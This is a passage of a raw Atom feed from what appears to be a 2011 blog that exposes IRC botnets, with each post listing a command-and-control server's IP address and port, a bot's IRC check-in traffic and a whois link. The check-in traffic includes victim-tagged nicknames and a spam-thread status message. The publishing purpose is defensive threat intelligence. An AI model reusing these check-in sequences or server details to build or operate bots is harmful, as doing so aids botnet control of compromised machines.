ngrBots hosted in United States  Franklin  Wisconsin Cyberlynk Network Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5433447723737725702</id><published>2011-11-18T12:19:00.000+01:00</published><updated>2011-11-18T12:19:36.142+01:00</updated><title type='text'>irc.selocell.com(irc botnet hosted in United States  Monstercommerce Llc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;206.188.205.6 7985&lt;br /&gt;&lt;br /&gt;NICK KCA[XP][3][55][45875][67470]&lt;br /&gt;PRIVMSG KCA[XP][3][55][45875][67470] :&lt;br /&gt;PING 1321617332&lt;br /&gt;NOTICE KCA[XP][3][55][45875][67470] :&lt;br /&gt;NICK KCA[XP][3][55][860][56512]&lt;br /&gt;USER KCA "" "irc.selocell.com" :Coded&lt;br /&gt;y KCA&lt;br /&gt;USERHOST KCA[XP][3][55][860][56512]&lt;br /&gt;MODE KCA[XP][3][55][860][56512] +iR-x&lt;br /&gt;JOIN #XP +a+s+d+f&lt;br /&gt;MODE #XP&lt;br /&gt;PRIVMSG #XP :&lt;br /&gt;2 Topic Okuma Aktif&lt;br /&gt;USERHOST KCA[XP][3][55][45875][67470]&lt;br /&gt;MODE KCA[XP][3][55][45875][67470] +iR-x&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now talking in #XP&lt;br /&gt;Topic On: [ #XP ] [ ]&lt;br /&gt;Topic By: [ tr0j3n ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/206.188.205.6&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5433447723737725702?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5433447723737725702/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/ircselocellcomirc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5433447723737725702'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5433447723737725702'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/ircselocellcomirc-botnet-hosted-in.html' title='irc.selocell.com(irc botnet hosted in United States  Monstercommerce Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1630859008799708153</id><published>2011-11-17T19:06:00.000+01:00</published><updated>2011-11-17T19:06:47.731+01:00</updated><title type='text'>gl0x.no-ip.info(irc botnet hosted in United States  San Jose  Cox Communications)</title><content type='html'>Server:24.250.173.11:5822&lt;br /&gt;Nick: N-[AUT-XP-31375]&lt;br /&gt;Username: 5130&lt;br /&gt;Joined Channel: #a&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/24.250.173.11&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1630859008799708153?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1630859008799708153/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/gl0xno-ipinfoirc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1630859008799708153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1630859008799708153'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/gl0xno-ipinfoirc-botnet-hosted-in.html' title='gl0x.no-ip.info(irc botnet hosted in United States  San Jose  Cox Communications)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8925529896024845404</id><published>2011-11-17T17:01:00.000+01:00</published><updated>2011-11-17T17:01:16.438+01:00</updated><title type='text'>205.234.231.33(irc botnet hosted in United States  Chicago  Hostforweb Inc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;205.234.231.33 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|24306]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-7448 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|24306] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/205.234.231.33&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8925529896024845404?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8925529896024845404/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/20523423133irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8925529896024845404'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8925529896024845404'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/20523423133irc-botnet-hosted-in-united.html' title='205.234.231.33(irc botnet hosted in United States  Chicago  Hostforweb Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4038844702909319978</id><published>2011-11-16T17:19:00.000+01:00</published><updated>2011-11-16T17:19:03.300+01:00</updated><title type='text'>190.254.18.77(irc botnet hosted in Colombia Colombia Telecomunicaciones S.a. Esp)</title><content type='html'>Remote Host Port Number&lt;br /&gt;190.254.18.77 1866&lt;br /&gt;&lt;br /&gt;NICK n[USA|XP|COMPUTERNAME]icvavry&lt;br /&gt;USER hh "" "lol" :hh&lt;br /&gt;PONG :25D8DDB6&lt;br /&gt;JOIN #!h!&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/190.254.18.77&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4038844702909319978?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4038844702909319978/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/1902541877irc-botnet-hosted-in-colombia.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4038844702909319978'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4038844702909319978'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/1902541877irc-botnet-hosted-in-colombia.html' title='190.254.18.77(irc botnet hosted in Colombia Colombia Telecomunicaciones S.a. Esp)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-9060717458676350173</id><published>2011-11-15T17:51:00.002+01:00</published><updated>2011-11-15T17:51:45.557+01:00</updated><title type='text'>89.248.164.76(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;89.248.164.76 6667&lt;br /&gt;&lt;br /&gt;NICK New{US-XP-x86}3726848&lt;br /&gt;USER 3726848 "" "3726848" :3726848&lt;br /&gt;MODE New{US-XP-x86}3726848 +iMm&lt;br /&gt;JOIN #cyber&lt;br /&gt;PONG 422&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/89.248.164.76&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-9060717458676350173?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/9060717458676350173/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/8924816476irc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/9060717458676350173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/9060717458676350173'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/8924816476irc-botnet-hosted-in.html' title='89.248.164.76(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8801005231434619545</id><published>2011-11-14T23:10:00.000+01:00</published><updated>2011-11-14T23:10:17.778+01:00</updated><title type='text'>64.34.200.181(irc botnet hosted in United States Newhall Serverbeach)</title><content type='html'>Remote Host Port Number&lt;br /&gt;64.34.200.181 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|73781]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-9402 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|73781] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/64.34.200.181&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8801005231434619545?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8801005231434619545/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/6434200181irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8801005231434619545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8801005231434619545'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/6434200181irc-botnet-hosted-in-united.html' title='64.34.200.181(irc botnet hosted in United States Newhall Serverbeach)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2163184766979166990</id><published>2011-11-14T19:27:00.002+01:00</published><updated>2011-11-14T19:27:41.499+01:00</updated><title type='text'>78.46.158.211(Godbot hosted in Germany Hetzner Online Ag)</title><content type='html'>Remote Host Port Number&lt;br /&gt;78.46.158.211 901&lt;br /&gt;&lt;br /&gt;NICK Godbot|USA|XP|1011011&lt;br /&gt;USER wonwgrzv "" "lol" :wonwgrzv&lt;br /&gt;JOIN #DOS&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/78.46.158.211&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2163184766979166990?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2163184766979166990/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/7846158211godbot-hosted-in-germany.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2163184766979166990'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2163184766979166990'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/7846158211godbot-hosted-in-germany.html' title='78.46.158.211(Godbot hosted in Germany Hetzner Online Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry></feed>
